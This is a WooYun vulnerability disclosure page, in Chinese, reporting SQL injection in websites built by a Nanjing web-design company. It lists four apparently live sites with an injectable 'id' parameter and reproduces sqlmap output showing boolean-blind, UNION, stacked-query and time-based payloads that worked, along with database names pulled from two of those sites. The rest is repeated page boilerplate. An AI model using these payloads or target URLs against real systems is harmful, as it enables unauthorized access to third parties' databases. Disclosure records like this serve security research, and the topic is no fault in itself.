南京夏恒网络建站系统存在SQL注入 | wooyun-2014-082806| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-082806

漏洞标题：南京夏恒网络建站系统存在SQL注入

漏洞作者：路人甲

提交时间：2014-11-13 15:20

修复时间：2015-02-11 15:22

公开时间：2015-02-11 15:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-11-13：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-02-11：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

接着某大牛的继续。

详细说明：

发现该公司开发的网站大部分都是JSP的只有少数是ASPX，就连企业站都是JSP，这样牛逼，另类，影响数量有这么大的建站公司在国内还是不多见的。
官网：http://www.xiaheng.net/

漏洞证明：

http://wooyun.org/bugs/wooyun-2014-071836

他的这处参数为：XID

案例如下：
http://www.shbo-xun.com/list.jsp?id=2
http://www.yihengkx.com/list.jsp?id=2
http://www.aohaosiyq.com/list.jsp?id=2
http://jingkeleici.com/list.jsp?id=2

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 9892=9892
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=-1696 UNION ALL SELECT NULL, CHAR(58)+CHAR(99)+CHAR(117)+CHAR(11
0)+CHAR(58)+CHAR(86)+CHAR(122)+CHAR(90)+CHAR(84)+CHAR(122)+CHAR(116)+CHAR(66)+CH
AR(67)+CHAR(72)+CHAR(97)+CHAR(58)+CHAR(116)+CHAR(100)+CHAR(108)+CHAR(58), NULL,
NULL, NULL, NULL, NULL, NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=2; WAITFOR DELAY '0:0:5';--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=2 WAITFOR DELAY '0:0:5'--
---
[19:43:45] [INFO] testing MySQL
[19:43:45] [WARNING] the back-end DBMS is not MySQL
[19:43:45] [INFO] testing Oracle
[19:43:45] [WARNING] the back-end DBMS is not Oracle
[19:43:45] [INFO] testing PostgreSQL
[19:43:46] [WARNING] the back-end DBMS is not PostgreSQL
[19:43:46] [INFO] testing Microsoft SQL Server
[19:43:46] [INFO] confirming Microsoft SQL Server
[19:43:46] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.2, JSP
back-end DBMS: Microsoft SQL Server 2000
[19:43:46] [INFO] fetching database names
[19:43:46] [INFO] the SQL query used returns 16 entries
[19:43:47] [INFO] retrieved: "agency5"
[19:43:47] [INFO] retrieved: "chinanewspaper"
[19:43:47] [INFO] retrieved: "hetang"
[19:43:47] [INFO] retrieved: "master"
[19:43:47] [INFO] retrieved: "model"
[19:43:47] [INFO] retrieved: "msdb"
[19:43:47] [INFO] retrieved: "newspaper"
[19:43:47] [INFO] retrieved: "Northwind"
[19:43:48] [INFO] retrieved: "pubs"
[19:43:48] [INFO] retrieved: "tempdb"
[19:43:48] [INFO] retrieved: "xfsztdb"
[19:43:48] [INFO] retrieved: "xiren16sjk"
[19:43:48] [INFO] retrieved: "xiren17sjk"
[19:43:48] [INFO] retrieved: "xiren1sjk"
[19:43:48] [INFO] retrieved: "xiren2sjk"
[19:43:48] [INFO] retrieved: "xiren3sjk"
available databases [16]:
[*] agency5
[*] chinanewspaper
[*] hetang
[*] master
[*] model
[*] msdb
[*] newspaper
[*] Northwind
[*] pubs
[*] tempdb
[*] xfsztdb
[*] xiren16sjk
[*] xiren17sjk
[*] xiren1sjk
[*] xiren2sjk
[*] xiren3sjk
[19:43:48] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[19:43:48] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
??\??\SQLMAP~1\SQLMAP~1\Bin\output\www.shbo-xun.com'

Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=2 AND 9167=9167
    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: id=-9735 UNION ALL SELECT NULL, NULL, CHAR(58)+CHAR(114)+CHAR(113)+
CHAR(117)+CHAR(58)+CHAR(121)+CHAR(98)+CHAR(121)+CHAR(119)+CHAR(67)+CHAR(85)+CHAR
(76)+CHAR(72)+CHAR(120)+CHAR(86)+CHAR(58)+CHAR(107)+CHAR(98)+CHAR(108)+CHAR(58),
 NULL, NULL, NULL, NULL, NULL--
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: id=2; WAITFOR DELAY '0:0:5';--
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: id=2 WAITFOR DELAY '0:0:5'--
---
[19:45:11] [INFO] testing MySQL
[19:45:12] [WARNING] the back-end DBMS is not MySQL
[19:45:12] [INFO] testing Oracle
[19:45:12] [WARNING] the back-end DBMS is not Oracle
[19:45:12] [INFO] testing PostgreSQL
[19:45:12] [WARNING] the back-end DBMS is not PostgreSQL
[19:45:12] [INFO] testing Microsoft SQL Server
[19:45:12] [INFO] confirming Microsoft SQL Server
[19:45:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: Apache 2.2.2, JSP
back-end DBMS: Microsoft SQL Server 2000
[19:45:13] [INFO] fetching database names
[19:45:13] [INFO] the SQL query used returns 18 entries
[19:45:13] [INFO] retrieved: "master"
[19:45:13] [INFO] retrieved: "model"
[19:45:13] [INFO] retrieved: "msdb"
[19:45:13] [INFO] retrieved: "Northwind"
[19:45:13] [INFO] retrieved: "pubs"
[19:45:14] [INFO] retrieved: "survey"
[19:45:14] [INFO] retrieved: "sztdb"
[19:45:14] [INFO] retrieved: "tempdb"
[19:45:14] [INFO] retrieved: "xiren11sjk"
[19:45:14] [INFO] retrieved: "xiren12sjk"
[19:45:14] [INFO] retrieved: "xiren13sjk"
[19:45:14] [INFO] retrieved: "xiren14sjk"
[19:45:14] [INFO] retrieved: "xiren15sjk"
[19:45:14] [INFO] retrieved: "xiren4sjk"
[19:45:15] [INFO] retrieved: "xiren5sjk"
[19:45:15] [INFO] retrieved: "xiren6sjk"
[19:45:15] [INFO] retrieved: "xiren7sjk"
[19:45:15] [INFO] retrieved: "xiren8sjk"
available databases [18]:
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] survey
[*] sztdb
[*] tempdb
[*] xiren11sjk
[*] xiren12sjk
[*] xiren13sjk
[*] xiren14sjk
[*] xiren15sjk
[*] xiren4sjk
[*] xiren5sjk
[*] xiren6sjk
[*] xiren7sjk
[*] xiren8sjk
[19:45:15] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[19:45:15] [INFO] fetched data logged to text files under 'C:\DOCUME~1\ADMINI~1\
??\??\SQLMAP~1\SQLMAP~1\Bin\output\www.yihengkx.com'

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-082806

漏洞标题：南京夏恒网络建站系统存在SQL注入

相关厂商：南京夏恒网络

漏洞作者：路人甲

提交时间：2014-11-13 15:20

修复时间：2015-02-11 15:22

公开时间：2015-02-11 15:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-082806

漏洞标题：南京夏恒网络建站系统存在SQL注入

相关厂商：南京夏恒网络

漏洞作者： 路人甲

提交时间：2014-11-13 15:20

修复时间：2015-02-11 15:22

公开时间：2015-02-11 15:22

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-082806"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云